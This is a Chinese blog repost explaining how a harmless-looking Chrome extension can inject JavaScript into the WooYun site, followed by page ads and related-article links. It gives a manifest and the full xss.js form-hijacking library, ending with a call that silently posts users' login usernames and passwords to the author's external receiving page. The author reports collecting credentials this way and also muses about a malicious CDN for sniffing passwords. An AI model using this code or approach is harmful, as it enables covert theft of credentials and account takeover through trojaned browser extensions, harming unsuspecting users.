利用Chrome插件向指定页面植入js,劫持 XSS

最新推荐文章于 2022-05-05 14:25:52 发布
最新推荐文章于 2022-05-05 14:25:52 发布
阅读量1.2k 收藏
点赞数
原文链接:https://www.cnblogs.com/developer-ios/p/5923496.html
版权

资源来自:https://www.cnblogs.com/developer-ios/p/5923496.html

 

 

0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

{

  "name": "XiaoChaJian",

  "version": "1.0",

  "manifest_version": 2,

  "author":"VIP",

  "icons": {

      "128": "icon.png"

   },

  "permissions": [

    "tabs","http://*/*","https://*/*"

  ],

  "content_scripts": [

    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}

   ]

}

 

contentscript.js内容:
alert(/xss/); 

商之翼专业电商解决方案提供商

【点击进入】

为企业和创业者提供电商系统及解决方案 13年电商服务经验,专注+专业 为电商助力!

查 看

 

 

 



那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

{

  "name": "JieChiBiaoDan",

  "version": "1.0",

  "manifest_version": 2,

  

  

"author":"VIP",

  "icons": {

      "128": "icon.png"

  

  

},

  "permissions": [

    "tabs","http://*/*","https://*/*"

  ],

  

  

"content_scripts": [

    {"js":["contentscript.js"],"matches":

  

["http://wooyun.org/user.php?

  

action=login*","http://www.wooyun.org/user.php?action=login*"]}

  

  

]

}

contentscript.js内容:

;;var xss = function(){

  var x = {

    'name':'xss.js',

    'version':'0.2.1',

    'author':'长短短(sogili)'

  };

  

  x.x=function(id){return document.getElementById(id)};

  

  //容错取值

  x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};

  

  //浏览器

  x.i={

    i:!!self.ActiveXObject&&(function(){

      for(var v=6,s=document.createElement('s');

        s.innerHTML='<![if gt IE '+(v++)+']

  

><i></i><![endif]-->',

        s.getElementsByTagName('i')[0];);

      return v;

    }()),

    c:!!self.chrome,

    f:self.mozPaintCount>-1,

    o:!!self.opera,

    s:!self.chrome&&!!self.WebKitPoint

  };

  

  //UA

  x.ua = navigator.userAgent;

  

  //判断是否为苹果手持设备

  x.apple=/ip(one|ad|od)/i.test(x.ua);

  

  //随机数

  x.rdm=function(){return~~(Math.random()*1e5)};

  

  //url编码(UTF8)

  x.ec=encodeURIComponent;

  

  x.html=function(){

    return document.getElementsByTagName('html')[0]

        ||document.write('<html>')

        ||document.getElementsByTagName

  

('html')[0];

  };

  

  /*

   * 销毁一个元素

   */

  x.kill=function(e){

    e.parentElement.removeChild(e);

  };

  

  /*

   *绑定事件

   */

  x.bind=function(e,name,fn){

    e.addEventListener?e.addEventListener

  

(name,fn,false):e.attachEvent("on"+name,fn);

  };

  

  /*

   * dom准备完毕时执行函数

   */

  x.ready=function(fn){

    if(!x.i.i){

      x.bind(document,'DOMContentLoaded',fn);

    }else{

      var s = setInterval(function(){

        try{

          document.body.doScroll('left');

          clearInterval(s);

          fn();

        }catch(e){}

      },4);

    }

  }

  

  /*

   * 同源检测

   */

  x.o=function(url){

    var link = x.dom('<a href="'+encodeURI(url)+'">',1);

    return link.protocol+link.hoatname+':'+(link.port||80)

  

==location.protocol+location.hoatname+':'+(location.port||80);

  };

  

  /*

   * html to dom

   */

  x.dom=function(html,gcsec){

    var tmp = document.createElement('span');

    tmp.innerHTML=html;

    var e = tmp.children[0];

    e.style.display='none';

    x.html().appendChild(e);

    gcsec>>0>0&&setTimeout(function(){

      x.kill(e);

    },gcsec*1000);

    return e;

  };

  

  /*

   * ajax

   */

  x.ajax=function(url,params,callback){

    (params instanceof Function)&&

  

(callback=params,params=void(0));

    var XHR = (!x.o(url)&&window.XDomainRequest)||

          window.XMLHttpRequest||

          (function(){return new ActiveXObject

  

('MSXML2.XMLHTTP')});

    var xhr = new XHR();

    xhr.open(params?'post':'get',url);

    xhr.withCredentials = true;

    try{params&&xhr.setRequestHeader('content-

  

type','application/x-www-form-urlencoded');}catch(e){}

    callback&&(xhr.onreadystatechange = function() {

      (this.readyState == 4 && ((this.status >= 200

  

&& this.status <= 300) || this.status == 304))&&callback.apply

  

(this,arguments);

    });

    xhr.send(params);

  };

  

  /*

   * CSRF

   */

  x.csrf=function(url,params,callback){

    (params instanceof Function)&&

  

(callback=params,params=void(0));

    if(params){

      var form = x.dom('<form method=post>');

      form.action=url;

      for(var name in params){

        var input = document.createElement

  

('input');

        input.name=name;

        input.value=params[name];

        form.appendChild(input);

      }

      var iframe = x.dom('<iframe sandbox

  

name=_'+x.rdm()+'_>',6);

      callback&&setTimeout(function(){

        x.bind(iframe,'load',callback);

      },30);

      form.target=iframe.name;

      form.submit();

    }else{

      var img = new Image();

      callback&&(img.onerror=callback);

      img.src=url;

    }

  };

  

  /*

   * 表单劫持

   */

  x.xform=function(form,action){

  

  

form.old_action=form.action,form.old_target=form.target,form.action=act

  

ion;

    var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');

    form.target=iframe.name;

    setTimeout(function(){

      x.bind(iframe,'load',function(){

  

  

form.action=form.old_action,form.target=form.old_target,form.onsubmit=n

  

ull,form.submit();

      });

    },30);

  };

  

  /*

   * 函数代理

   */

  x.proxy=function(fn,before,after){

    return function(){

      before&&before.apply(this,arguments);

      var result = fn.apply(this,arguments);

      after&&after.apply(this,arguments);

      return result;

    }

  };

  

  return x;

}();

xss.xform(document.forms[1],'http://vip.yupage.com/wy.php');//劫持表单


  http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:







开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。

商之翼专业电商解决方案提供商

【点击进入】

为企业和创业者提供电商系统及解决方案 13年电商服务经验,专注+专业 为电商助力!

查 看

 

 

 



再去看看,用户名密码已经躺在那里了。

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据<-|
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?

lyJ157142
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xsschef, Chrome 扩展开发框架.zip
09-18
xsschef, Chrome 扩展开发框架 XSS主厨- Chrome 扩展开发框架按 Krzysztof Kotowicz 1.0https://github.com/koto/xsschef 这是一个 Chrome 扩展开发框架- think认为牛肉用于 Chrom
XssEncode
weixin_33674976的博客
01-24 228
0x00 闲扯 好吧继上一篇文章之后,就没发文章了!(其实是一直在写但是写的很少还凑不起一篇文章而已) 但是这几天对插件进行了一定的改良了 因为在自己在实际的XSS过程中也发现了自己的插件 还不够强大! 不能够百分之百的满足自己的需求!所以就根据自己平常的需求给加了上去! 我想做到玩XSS一个工具即可解决需求!所以感觉即使是现在的插件也还有很大的不足! 所以很希望得到你们的意见 ...
(五)通过谷歌插件实现Ajax劫持
chantor7的博客
05-05 1495
(五)通过谷歌插件实现Ajax劫持 ​ 通过Selenium和代理已经可以很顺畅地拿到网页页面上可以看到的内容了。某些网站采用了Ajax技术,就我遇到的一个问题来说吧,在爬某网站的某个主页面的时候,它使用Ajax动态更新翻页内容,URL并没有变,这时候如果直接按URL发请求过去请求到的始终都是第一页的信息(如果有大神看见拜托指点一下),加上我发现它其实还有很多有用的信息并没有在页面直接显示,所以就有了能不能不通过页面直接把信息下载下来的想法。 ​ 下面是我参考一些资料,写的一个例子,具体实现的是获取名字
chrome插件开发基础以及如何防止劫持
qq_35168861的博客
03-26 2093
谷歌浏览器插件,可以大大的扩展你的浏览器的功能。包括但不仅限于这些功能:捕捉特定网页的内容,捕捉HTTP报文,捕捉用户浏览动作,改变浏览器地址栏/起始页/书签/Tab等界面元素的行为,与别的站点通信,修改网页内容…… 开发文档(360翻译的):https://open.chrome.360.cn/extension_dev/overview.html 开发流程比较简单: 打开开发者模式,加载扩展程序 创建manifest.json文件 此处指写了一部分常用的,详细的请查看文档 { "manifes
phantomjs-burpsuite安装XSS所需插件
03-15
PhantomJS是一个基于Webkit的服务器端JavaScript API,它允许开发者无须浏览器支持即可执行Web页面的脚本和渲染。在网络安全领域,特别是在渗透测试和Web应用安全审计中,PhantomJS经常被用来自动化浏览器行为,例如...
Chrome插件开发系列一:弹窗终结者开发实战
10-14
Chrome插件,也被称为Chrome扩展,是基于 Chromium 浏览器的一种增强功能,它们通过JavaScript、HTML和CSS等技术编写,能够实现对浏览器界面、功能的定制和扩展,以满足用户的个性化需求。在本文中,我们将深入探讨...
Chrome扩展页面动态绑定JS事件提示错误
10-26
CSP 通过指定有效的源,限制页面上的脚本和内容,包括脚本文件(如.js)、样式表(如.css)、图像、对象、iframe等,都可以被白名单形式的策略所限制。 在Chrome扩展中,根据扩展内容的不同,CSP的策略也会有所区别...
用VueJS写一个Chrome浏览器插件的实现方法
10-17
基于给定文件内容,以下是详细知识点: ...通过这些知识点,可以构建一个基础的Chrome浏览器插件利用VueJS提高开发效率,并处理相关的安全与配置问题。理解并掌握这些知识点对于开发有效的Chrome扩展程序至关重要。
Chrome - CheckBot插件
05-23
Chrome - CheckBot插件是一款专为谷歌浏览器(Chrome)设计的强大工具,集成了网站优化、搜索引擎优化(SEO)以及安全检查的功能。它旨在帮助网站管理员、SEO专家和开发者提升网站性能,确保网络安全性,并查找并...
模拟XSS跨站攻击
从2017开始记录起的博客
04-03 2087
模拟XSS跨站攻击 假设场景: 在入库和出库时均不作处理时 会被利用触发 2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>XSS跨站攻击</title> </head> <body> ...
谷歌启用抓取JavaScript,应对方案!
weixin_44122625的博客
12-20 132
谷歌启用了抓取JavaScript来深入了解网站,这样,如果网站或黑页是加了跳转代码或判断代码,很有可能将会被识别出来。虽然目前只是谷歌启用识别JavaScript文件,但国内搜索引擎很可能也会跟着模仿,毕竟一直是这样的。 现在不确定到底谷歌抓取JavaScript了以后,对JS的跳转有没有影响,但还是建议预防为主,所以这边推荐几个应对方案。其实之前就觉得有可能JS文件被发现,所以当时我们就已经有...
【黑帽SEO系列】网页劫持
asdf8968的博客
11-27 4590
  网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。 网站劫持检测 1、检测网站是否被劫持 2、域名是否被墙 3、...
chrome扩展(插件)开发(三)被content_script注入的js使用和限制
热门推荐
joy1793的博客
10-22 1万+
chrome 插件之消息通知 自有api和sessionStorage还有自定义事件 chrome扩展之加载外部js到原网页中 1使用jquery的loadJs() 2 使用chrome.extension.getURL
点击劫持漏洞
Zeker62的博客
08-23 1731
目录什么是点击劫持?如何构建基本的点击劫持攻击使用预填表单输入进行点击劫持帧破坏脚本将点击劫持与 DOM XSS攻击相结合多步点击劫持如何防止点击劫持攻击X-Frame-Options内容安全策略 ( CSP )什么是点击劫持? 点击劫持是一种基于界面的攻击,通过点击诱饵网站中的一些其他内容,诱使用户点击隐藏网站上的可操作内容。考虑以下示例: 网络用户访问诱饵网站(可能这是电子邮件提供的链接)并...
js注入+chrome插件爬虫
qq_39246785的博客
06-07 2145
转载请注明原创 本例以http://www.biqugexsw.com/30_30505/为例 页面如下    (1)什么是js注入   首先观察控制台例子的控制台,发现所有的链接在.linsmain下      在console.log下输入Var s=$(".listmain a");for(var i=0;i&lt;s.length;i++){console.log($(s[i]).attr...
函数劫持能做啥?前端黑科技揭秘
weixin_33716154的博客
05-24 176
啥是函数劫持?其实就是给调用的函数加一层包装函数,在包装函数里调用一下原函数,有点像代理服务器的作用, 拦截一些全局对象和方法, 能实现一些非常便利的全局功能,今天我就抛砖引玉跟大家分享一下。 人生苦短,苦中做乐的console.log 美化 前段时间看到emoji图标在地址栏的动画应用,挺有趣的,很娱乐,我就试着能不能把emoji应用于到我正在研究的函数劫持的实例中,实际做了一下效果还不错,自娱...
学习日志2:存储型XSS+XHR构造PUT请求实现账号劫持
m0_37622973的博客
09-01 487
摘自freebuf 出处:https://www.freebuf.com/vuls/211253.html 漏洞出处:Medium 关键点: 1.登陆后的用户可以修改注册邮箱,且此步骤不需要进行验证,可以向该邮箱发送包含临时登录的URL链接。 2.关键cookie被设置了HTTPonly。 3.HTTP头中存在X-XSRF-Token,可以使用js盗取。 漏洞发现过程:发现博客文章中jAvAsCr...
Javascript 如何全面接管xhr请求
tager168的博客
10-23 1938
背景及思考 为什么需要接管xhr请求?这就需要我们了解它的一些应用场景。我们如何统一项目中xhr请求的行为,监控请求的整个生命周期、如何自定义拦截请求并返回mock数据、如何制定完全可控的控制台(如vconsole那样) 、如何监控所有api请求的健康状态 等等! 有一种最常见的情况。比如项目中发起请求的方式不一,有的在js sdk或私有npm库中发起、有的在引入了第三方js cdn中发起、有的由项目中统一的ajax、axios发起。如果我们需要对项目中所有请求增加某些统一的行为该如何处理了? 原生XML
搜索框能否植入存储型xss
最新发布
07-23
如果这些代码被执行,它们可以在访问该页面的其他用户浏览器上运行,比如篡改数据、劫持会话等。 为了防止这种情况,网站需要对用户输入进行严格的验证和清理,通常包括以下几个步骤: 1. 输入验证:检查搜索关键词...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值